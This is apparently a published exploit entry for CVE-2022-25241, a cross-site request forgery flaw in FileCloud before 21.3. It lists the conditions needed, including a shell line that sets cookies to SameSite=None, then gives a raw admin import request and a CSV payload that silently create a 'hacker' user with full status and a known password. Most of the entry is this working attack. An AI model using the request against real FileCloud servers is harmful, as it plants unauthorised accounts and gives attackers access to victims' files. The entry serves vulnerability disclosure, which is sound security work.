# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF) # Date: 2022-02-20 # Exploit Author: Masashi Fujiwara # Vendor Homepage: https://www.filecloud.com/ # Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2 # Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447) # Tested on: # OS: Ubuntu 18.04.6 LTS (Docker) # Apache: 2.4.52 # FileCloud: 21.2.4.17315 # CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation) # Conditions 1. Only vulnerable if cookies have samesite set to None (SameSite=None). echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php 2. Use https as target url (When cookies set SameSite=None, also set Secure). # PoC (HTML) CSRF PoC for CVE-2022-25241 Creat hacker user with Password1 via CSV file upload. # HTTPS Request POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1 Host: 192.168.159.129:8443 Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493 Content-Length: 365 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW Connection: close ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv" Content-Type: application/vnd.ms-excel UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES ------WebKitFormBoundaryiAXsUsJ2ZV54DFuW-- # CSV file format UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES